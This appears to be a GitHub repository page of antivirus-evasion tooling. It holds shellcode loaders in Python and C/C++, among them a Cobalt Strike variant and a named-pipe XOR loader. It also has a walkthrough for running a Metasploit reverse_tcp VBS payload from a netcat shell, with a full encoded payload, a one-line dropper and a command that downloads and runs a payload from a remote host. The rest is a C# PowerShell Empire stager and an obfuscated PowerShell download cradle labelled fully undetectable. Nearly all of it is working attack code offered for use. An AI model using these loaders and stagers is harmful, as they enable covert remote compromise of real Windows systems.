memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                   	  ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()


____________________________________________________________________________________________________________________
// C++

#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行不显示窗口

//shellcode
unsigned char buf[] = "";

void run(void* buffer) {
	void(*function)();
	function = (void (*)())buffer;
	function();
}

void main()
{
	LPVOID ptr = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlMoveMemory(ptr, buf, sizeof(buf));
	LPVOID ht = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
	WaitForSingleObject(ht, -1);
}

____________________________________________________________________________________________________________________

#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = "";

void main()
{
	__asm
	{
		mov eax, offset buf
		jmp eax
	}
}

____________________________________________________________________________________________________________________
//cobaltstrike

#include "stdio.h"
#include "windows.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = "";

void run(void* buffer) {
	void(*function)();
	function = (void (*)())buffer;
	function();
}

void main()
{
    LPVOID heapp = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    void* ptr = HeapAlloc(heapp, 0, sizeof(buf));
    RtlMoveMemory(ptr, buf, sizeof(buf));
    LPVOID ht = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&run, ptr, 0, NULL);
    WaitForSingleObject(ht, -1);
}


____________________________________________________________________________________________________________________

#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#define BUFF_SIZE 1024
char buf[] = "";
PTCHAR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");

BOOL RecvShellcode(VOID){
    HANDLE hPipeClient;
    DWORD dwWritten;
    DWORD dwShellcodeSize = sizeof(buf);
    
    WaitNamedPipe(ptsPipeName,NMPWAIT_WAIT_FOREVER);
    
    hPipeClient = CreateFile(ptsPipeName,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING ,FILE_ATTRIBUTE_NORMAL,NULL);

    if(hPipeClient == INVALID_HANDLE_VALUE){
        printf("[+]Can't Open Pipe , Error : %d \n",GetLastError());
        return FALSE;
    }

    WriteFile(hPipeClient,buf,dwShellcodeSize,&dwWritten,NULL);
    if(dwWritten == dwShellcodeSize){
        CloseHandle(hPipeClient);
        printf("[+]Send Success ! Shellcode : %d Bytes\n",dwShellcodeSize);
        return TRUE;
    }
    CloseHandle(hPipeClient);
    return FALSE;
}


int wmain(int argc, TCHAR * argv[]){

    HANDLE hPipe;
    DWORD dwError;
    CHAR szBuffer[BUFF_SIZE];
    DWORD dwLen;
    PCHAR pszShellcode = NULL;
    DWORD dwOldProtect; 
    HANDLE hThread;
    DWORD dwThreadId;
    //:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea
    hPipe = CreateNamedPipe(
        ptsPipeName,
        PIPE_ACCESS_INBOUND,
        PIPE_TYPE_BYTE| PIPE_WAIT,
        PIPE_UNLIMITED_INSTANCES,
        BUFF_SIZE,
        BUFF_SIZE,
        0,
        NULL);

    if(hPipe == INVALID_HANDLE_VALUE){
        dwError = GetLastError();
        printf("[-]Create Pipe Error : %d \n",dwError);
        return dwError;
    }

    CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)RecvShellcode,NULL,NULL,NULL);

    if(ConnectNamedPipe(hPipe,NULL) > 0){
        printf("[+]Client Connected...\n");
        ReadFile(hPipe,szBuffer,BUFF_SIZE,&dwLen,NULL);
        printf("[+]Get DATA Length : %d \n",dwLen);
        
        pszShellcode = (PCHAR)VirtualAlloc(NULL,dwLen,MEM_COMMIT,PAGE_READWRITE);
        
        CopyMemory(pszShellcode,szBuffer,dwLen);

        for(DWORD i = 0;i< dwLen; i++){
            Sleep(50);
            _InterlockedXor8(pszShellcode+i,10);
        }

        
        VirtualProtect(pszShellcode,dwLen,PAGE_EXECUTE,&dwOldProtect);
        // Shellcode
        hThread = CreateThread(
            NULL, 
            NULL, 
            (LPTHREAD_START_ROUTINE)pszShellcode, 
            NULL, 
            NULL, 
            &dwThreadId 
        );

        WaitForSingleObject(hThread,INFINITE);
    }

    return 0;
}

https://github.com/sayhi2urmom/Antivirus_R3_bypass_demo

https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security/defense-evasion/bypassing-windows-defender-one-tcp-socket-away-from-meterpreter-and-cobalt-strike-beacon.md

Execute metasploit vbs payload in cmd shell

If you are a pentester/researcher, you may want to gain a meterpreter session from a cmd shell at sometimes, ex: (sqlmap --os-shell, or other tools). Ex:

$ ncat -l -p 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.  

C:\Documents and Settings\test\Desktop>ver
ver  

Microsoft Windows XP [Version 5.1.2600]
C:\Documents and Settings\test\Desktop>

In the previous, you want try the following methods:

  • a. translate exe into a batch script.
  • b. download the payload file from remote server (ftp, tftp, http, ....)
  • c. ....

Now, I'll show you how to run metasploit payload in cmd.exe. Please try to think about the following questions:

  1. How to generate a payload with msfvenom ?
  2. How to run payload in a simple/compatible way ?

How to generate a payload with msfvenom ?

In order to test the payload on Windows XP/2003, we choose the vbs format . If you need help, please try [msfvenom -h]

$ msfvenom -p windows/meterpreter/reverse_tcp
 LHOST=192.168.1.100 LPORT=4444 -f vbs --arch x86 --platform win

 No encoder or badchars specified, outputting raw payload
 Payload size: 333 bytes
 Final size of vbs file: 7370 bytes
 Function oSpLpsWeU(XwXDDtdR)
  urGQiYVn = "" & _           
  XwXDDtdR & ""      
  Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
  gFMdOBBiLZ.LoadXML(urGQiYVn)
  oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
  set gFMdOBBiLZ = nothing
 End Function

 Function skbfzWOqR()
  cTENSbYbnWY = "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"
  Dim GBHMAfCsea
  Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
  Dim nYosrMtHSIOKSTI
  Dim LNXsqHXEKZQU
  Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
  LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
  GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
  YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
  Dim voFeIDpffjdo
  Set voFeIDpffjdo = CreateObject("Wscript.Shell")
  WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
  Set WQwWDbhse = CreateObject("ADODB.Stream")
  WQwWDbhse.Type = 1
  WQwWDbhse.Open
  WQwWDbhse.Write WwqoNcaCIbw
  WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
  voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
  GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
  GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
End Function

skbfzWOqR

How to run payload in a simple/compatible way ?

Read the code, we can create a simple vbs script called msf.vbs to execute the shellcode. A vbs script can be executed on Windows XP/2003/Vista/7/8/10/2008/2012/....

shellcode = WScript.Arguments.Item(0)
strXML = "" & shellcode & ""
Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
set oXMLDoc = nothing
 Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempdir
Dim basedir
Set tempdir = fso.GetSpecialFolder(2)
basedir = tempdir & "\" & fso.GetTempName()
fso.CreateFolder(basedir)
tempexe = basedir & "\" & "test.exe"
Dim adodbstream
Set adodbstream = CreateObject("ADODB.Stream")
adodbstream.Type = 1
adodbstream.Open
adodbstream.Write decode
adodbstream.SaveToFile tempexe, 2
Dim wshell
Set wshell = CreateObject("Wscript.Shell")
wshell.run tempexe, 0, true
fso.DeleteFile(tempexe)
fso.DeleteFolder(basedir)

Ok, how to run it in cmd.exe ? Do you want  to paste the code line by line ?  A simple command is created as follow:

upload msf.vbs to vuln lab with a single command,

echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs

execute metasploit payload with msf.vbs and cscript.exe

C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>

Bypass nc shell buffer size limit

If the script is used in cmd.exe on localhost, everything goes well. But if it is used in netcat cmd shell, the payload will be broken. ex:

C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP

Microsoft (R) Windows Script Host Version 5.7
Copyright (C) Microsoft Corporation. All rights reserved.

C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
  • origin payload size: 6160
  • netcat handle payload size: 4068

Pleae try it yourself, For security tests, another vbs script is created.

echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs

Run the following command to execute your vbs payload:

START /B cscript.exe %TEMP%\msf.vbs http://192.168.1.100:8080/payload.txt

ByPassAV Empire-PowerShell part 1

using System;
using System.Collections.Generic;
using System.Linq;
using System.Management.Automation;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
 
namespace PSEmpire_Stage1
{
    class Program
    {
        // RC4 Class to decrypt the stage 2 data
        // Created by Jeong ChangWook. Source https://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4
        public class RC4
        {
            public static byte[] Encrypt(byte[] pwd, byte[] data)
            {
                int a, i, j, k, tmp;
                int[] key, box;
                byte[] cipher;
 
                key = new int[256];
                box = new int[256];
                cipher = new byte[data.Length];
 
                for (i = 0; i < 256; i++)
                {
                    key[i] = pwd[i % pwd.Length];
                    box[i] = i;
                }
                for (j = i = 0; i < 256; i++)
                {
                    j = (j + box[i] + key[i]) % 256;
                    tmp = box[i];
                    box[i] = box[j];
                    box[j] = tmp;
                }
                for (a = j = i = 0; i < data.Length; i++)
                {
                    a++;
                    a %= 256;
                    j += box[a];
                    j %= 256;
                    tmp = box[a];
                    box[a] = box[j];
                    box[j] = tmp;
                    k = box[((box[a] + box[j]) % 256)];
                    cipher[i] = (byte)(data[i] ^ k);
                }
                return cipher;
            }
 
            public static byte[] Decrypt(byte[] pwd, byte[] data)
            {
                return Encrypt(pwd, data);
            }
 
        }
 
        // Hide Windows function by our friends from StackOverFlow
        // https://stackoverflow.com/questions/34440916/hide-the-console-window-from-a-console-application
        [DllImport("kernel32.dll")]
        static extern IntPtr GetConsoleWindow();
 
        [DllImport("user32.dll")]
        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
 
        static void Main(string[] args)
        {
            // To Hide the ConsoleWindow (It may be a better way...)
            var handle = GetConsoleWindow();
            ShowWindow(handle, 0);
 
            // Avoid sending Expect 100 Header 
            System.Net.ServicePointManager.Expect100Continue = false;
 
            // Create a WebClient Object (No Proxy Support Included)
            WebClient wc = new WebClient();
            string ua = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
            wc.Headers["User-Agent"] = ua;
            wc.Headers["Cookie"] = "session=968PH6bE9CDkwYGfsUPraz0x5PQ=";
 
            // Set the Server Address and URL 
            string server = "http://192.168.6.119:8081";
            string target = "/CWoNaJLBo/VTNeWw11212/";
 
            // Download The Data or Stage 2
            byte[] data = wc.DownloadData(server + target);
 
            // Extract IV
            byte[] iv = data.Take(4).Select(i => i).ToArray();
 
            // Remove the IV from the data
            byte[] data_noIV = data.Skip(4).ToArray();
 
            // Set Key value for decryption. PowerEmpire StageingKey value 
            string key = "fdcece0a22c10f83dccc8f17c95a33d4";
            byte[] K = Encoding.ASCII.GetBytes(key);
 
            // Combine the IV + Key (New random key each time)
            byte[] IVK = new byte[iv.Length + K.Length];
            iv.CopyTo(IVK, 0);
            K.CopyTo(IVK, iv.Length);
 
            // Decrypt the Message
            byte[] decrypted = RC4.Decrypt(IVK, data_noIV);
 
            // Convert the stage2 decrypted message from bytes to ASCII
            string stage2 = System.Text.Encoding.ASCII.GetString(decrypted);
 
            // Create a PowerShell Object to execute the command 
            PowerShell PowerShellInstance = PowerShell.Create();
 
            // Create the variables $ser and $u which are part of the downloaded stage2
            PowerShellInstance.Runspace.SessionStateProxy.SetVariable("ser", server);
            PowerShellInstance.Runspace.SessionStateProxy.SetVariable("u", ua);
 
            // Add the Script Stage 2 to the Powershell Object
            PowerShellInstance.AddScript(stage2);
 
            // Execute the Script!
            PowerShellInstance.Invoke();
 
        }
    }
}

compile:

csc.exe PSEmpireStage1.cs /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

For more details see video

ByPassAV Empire-PowerShell part 2

360 fud

"[SYsTem.NET.SErvIcePOInTMANAgER]::EXPecT100CONtiNuE=0;$WC=NEW-OBjECT SYstem.NeT.WEBCliENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)
like Gecko';$WC.HeAdErS.Add('User-Agent',$u);$WC.PRoxY= [SYStem.NEt.WEbREqUEsT]::DEfaulTWEBPrOxY;$WC.ProxY.CreDEnTials = [SySTEm.NET.CreDenTIalCache]::DeFAUltNETWOrkCReDentIALs;$Script:Proxy = $wc.Proxy;$K= [SYStEm.TeXT.ENCodiNG]::ASCII.GEtBytES('JV+~fgh!GFWZ8=eiEN{[#}&x_XLtHKT7');$R= {$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J-(-$S[$_])- (-$K[$_%$K.CoUnt]))%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H= ($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_- bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://172.16.3.77:80';$t='/news.php';$Wc.HEaDERs.AD joIN[ChAr[]](& $R $datA ($IV+$K))|IEX"

fully-undetectable-backdooring-pe-file

PowerEmpire-Stage-1-to-CSharp

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

135 stars

Watchers

7 watching

Forks

37 forks
Report repository

Releases

No releases published

Packages

No packages published